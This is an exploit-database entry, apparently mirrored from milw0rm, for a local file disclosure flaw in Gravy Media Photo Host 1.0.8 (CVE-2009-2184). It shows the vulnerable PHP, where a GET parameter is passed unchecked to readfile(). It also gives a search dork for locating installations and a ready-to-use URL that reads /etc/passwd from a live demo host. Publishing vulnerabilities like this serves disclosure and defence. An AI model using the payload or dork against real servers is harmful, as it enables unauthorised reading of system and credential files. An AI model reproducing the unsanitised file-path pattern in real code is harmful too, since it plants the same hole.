[] NeoSense
E X P L O I T S
title author type platform port cve id

Gravy Media Photo Host 1.0.8 - Local File Disclosure

Author: Lo$er
type: webapps
platform: php
port: 
date_added: 2009-06-21 
date_updated:  
verified: 1 
codes: OSVDB-55280;CVE-2009-2184 
tags: 
aliases:  
screenshot_url:  
application_url: 
==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================

Vendor:http://www.gravy-media.com/
Download:register to download
Dork:"Powered by Gravy Media"
Discovered By:Lo$er

====Vulnerable code(forcedownload.php)====
27. $filename = $_GET['file'];

70. readfile("$filename");
====Demo====

http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd

# milw0rm.com [2009-06-22]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.